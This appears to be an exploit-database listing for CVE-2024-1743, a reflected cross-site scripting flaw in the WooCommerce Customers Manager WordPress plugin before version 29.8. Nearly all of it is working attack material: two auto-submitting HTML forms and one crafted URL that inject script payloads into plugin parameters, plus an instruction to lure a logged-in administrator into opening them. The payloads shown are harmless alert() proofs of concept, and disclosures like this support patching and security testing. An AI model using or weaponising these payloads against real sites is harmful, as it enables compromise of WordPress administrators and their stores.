Exploit for WooCommerce Customers Manager < 29.8 - Reflected XSS CVE-2024-1743

Name: Exploit for WooCommerce Customers Manager < 29.8 - Reflected XSS CVE-2024-1743
Rating: 5 (80 reviews)

2024-04-03 | CVSS 6.0

## https://sploitus.com/exploit?id=WPEX-ID:3CB1F707-6093-42A7-A778-2B296BDF1735
Make a logged in admin open the HTML page/URLs below

<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=woocommerce-customers-manager" method="POST">
        <input type="text" name="page" value='"><script>alert(/XSS-page/)</script>'>
        <input type="text" name="wccm_customers_ids" value='"><script>alert(/XSS-wccm_customers_ids/)</script>'>
        <input type="submit" value="submit">
    </form>
</body>

<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/?page=woocommerce-customers-manager&action=customer_details" method="POST">
        <input type="text" name="page" value='"><script>alert(/XSS/)</script>'>
        <input type="submit" value="submit">
    </form>
</body>

https://example.com/wp-admin/admin.php?page=woocommerce-customers-manager&action=wccm-customer-metadata&customer="><script>alert(/XSS/)</script>